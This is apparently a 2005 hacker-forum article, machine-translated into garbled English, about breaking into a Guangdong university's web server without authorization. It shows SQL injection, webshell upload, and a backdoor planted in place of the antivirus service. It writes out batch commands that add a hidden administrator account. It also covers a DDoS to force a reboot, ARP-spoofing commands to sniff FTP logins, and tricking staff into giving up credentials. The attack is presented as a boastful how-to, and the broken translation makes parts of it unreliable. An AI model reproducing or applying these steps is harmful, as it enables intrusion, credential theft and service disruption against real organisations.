Recommendation:the Guangdong a University site detection notes(figure)-vulnerability warning-the black bar safety net

2005-10-26T00:00:00
ID MYHACK58:6220054060
Type myhack58
Reporter 佚名
Modified 2005-10-26T00:00:00

Description

Recently by PPMM in a McDonald's cajoling, let me test out their school website, security how to,this thought can like our school like ten minutes away,I agreed, I did not expect...... The following start, in order not to cause unnecessary trouble, the removal of sensitive information. C:\>ping www.*. com Pinging www.. com[2 1 8.*. 9 6. 3 9] with 3 2 bytes of data Reply from 2 1 8.. 9 6. 3 9: bytes=3 2 time=687ms TTL=1 0 7 Take X-Scan-v3. 2 sweep a bit, there is nothing to loopholes in the system, the site opened a 2 1, A 8 0, A 1 4 3 3, go on the website to collect a point webmasters, and teachers with some information, PPMM see I am not looking for someone's mailbox, QQ number, network name, MM listen to me, you want these information to make a dictionary, she also provides the management of the website of the teacher for some personal information such as: a salary, a marital status, a few girlfriends, the home has big cat,#¥%...#%#¥。 Collected after manually make a dictionary hang dictionary in the scan, see if you can sweep a weak password out, as it would be convenient for many, Khan~~A also did not sweep out, and omitted in the N-hundred words failed test results. OK we now summarize the information obtained, the station network section a lot of ASP, but not injected, there is a guestbook but didn't get out of the database, and the character filter is also very strict, FTP version unknown, a Download System, as if it is their own writing, overall is a ASP+MSSQL+WINDOWS2000 erection site. To see the kind of luck today really good, the MM says:“Server secure”, and happy ing call it a day. That only see MM T“today, if you do not put the server out of unsafe, you are unsafe......”that Afraid afraid to to continue. The server I was unable to see the same network has no vulnerable host, maybe be able to sniff out the target server for some sensitive information too! Tracert see the gateway routing information, to get SuperScan 3. 0 scan 2 1 8.**. 9 6. 3 9/2 4 segment of the IP, the only sweep 2 1, A 8 0, A 1 4 3 port 3, as shown in Figure 1.

!

Oh so much better! Just find a IP, get the Veteran's“virtual site query tool”look at the 1 2 5 sites, with the bright boy of the WEB-integrated testing procedures, batch scanning injection point.

!

A cigarette after the results came out, the presence of injection site N more N<1 0 as Figure 3,

!

While using SuperScan to scan the host for open ports, the server in addition to open the above ports there are 3 3 8 9 in. Good on this station.^Q^, casually take a can be injected into the connection to test, waiting...... Is a cigarette, the result is finally out in Figure 4. !

Username:henry2006, password Content:1 2 1 4 2 0 0 6, administrator login address: http://www.*. com/admin/admin_m. asp. The background is not large, but have a database backup is sufficient. For a business to send a single encrypted“image”of advertising, in the backup into asp. After login, execute the net start, to not look like he is limiting the CMD. The EXE execute permissions, and turn, in addition to the disk C outside of the other letter may be the everyone full control on the D-pad to see the target D:\ rising\rav\, Oh this is our lovely rising! But also nothing too happy, because if you replace this service to elevation of Privilege will require a server restart, the couple to be impatient and see there's nothing else first. In the pony enter c:\winnt\system32\inetsrv\data\and see if I can jump to this directory, by default this directory is for anyone with Full Control permissions. As shown in Figure 5, The

!

Path error or disk space or no permission to access! In view of the following SERV-U the default installation directory, the results also failed....... Omitted N times test. Had to use Rising this service to enhance the permissions. The first CCenter. exe into the WEB directory to download to the local machine, build a batch file to add the following statement: @echo off net user destiny 1 2 3%&$%FSDFh /add net localgroup administrators destiny /add Then take out a file bundled with the machine, the download of the CCenter. exe and batch files, a small back door consolidation after the upload, the other side of the CCenter. exe replaced its own CCenter it. Now just need the other side of the machine rebooted, our batch file and the backdoor file can run! Due to the Windows instability of the system, the host in a few days it will reboot once. I black stand the time very carefully, and the hostDDOSwill spook him., 偷眼 a watch station on the edge of the MM don't know when I used to decorate the Boxing gloves to bring, I didn't dare to ask her in a few days. Okay my broiler stronger, had to D Server, go out and buy a pack of cigarettes of time the server hung up. 3 3 8 9 After Login we need to pass two pieces of software in their own machine to open a FTP to winpcap, the arpspoof is transmitted to the server. winpcap sniffing the use of a driver, arpspoof is a ARP spoofing, a small tool that has recently been a large cattle modifying function and strong, the error probability is also less. ARP spoofing this technique is antique level of, the online data are also many, I just simple say about ARP spoofing works, we just tracert the gateway for the 2 1 8.. 9 6. 2 5 4, the target host is 2 1 8.. 9 6. 3 9, so we'll just cheat 2 1 8.. 9 6. 2 5 4 and 2 1 8.. 9 6. 3 9 You can. That is to tell 2 1 8.. 9 6. 2 5 4,2 1 8.. 9 6. 3 9 The MAC address is my own(2 1 8.. 9 6. 4 5);then tell 2 1 8.. 9 6. 3 9, 2 1 8.. 9 6. 2 5 4 The MAC address is own(2 1 8.. 9 6. 4 5)。 This way all the data packet will be sent to the 2 1 8.. 9 6. 4 and 5, and by the 2 1 8.. 9 6. 4 5 to achieve the forwarding. The basic syntax is: ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP] Wherein Spoof IP1 and IP2 is wanted for deception and sniffing the IP address, Own IP is your own IP address, note that the three IP must be on the same network segment without crossing a router. arpspoof.exe 2 1 8.. 9 6. 2 5 4 2 1 8.. 9 6. 3 9 2 1 8.**. 9 6. 4 5 2 1 c: \boot.txt This time there is only one thing to do, and that is the other admin with FTP login......that In the command line to run easily is the administrator found, but MM said he had a way to make admin 1 0 minutes to log on, she said it's called“steal+desperate measure”, I see how that's a“honey trap”in. Don't know her to the teacher on the phone said What, anyway in about half an hour to get the FTP of an account, this permission is very big, want to upgrade to is not what difficult thing. When you want to continue to elevate permissions when the mouse is not already in my hands, and this time the MM is to get my“fruits of labor”in the show off. PostScript: less than 2 0 minutes two sets of Server Permissions in the MM show off the sound disappears. This invasion is not used to what the new technology, just some of the tools of composition, sniffing is also a few years ago the technology, but this Sniffer is very simple, not in the three-tier exchange network or across the route for sniffing, in the cross-routing of sniffing the probability of success is very low for a side dish I'm now also less than one-tenth of probability, I hope this article can do the topic role.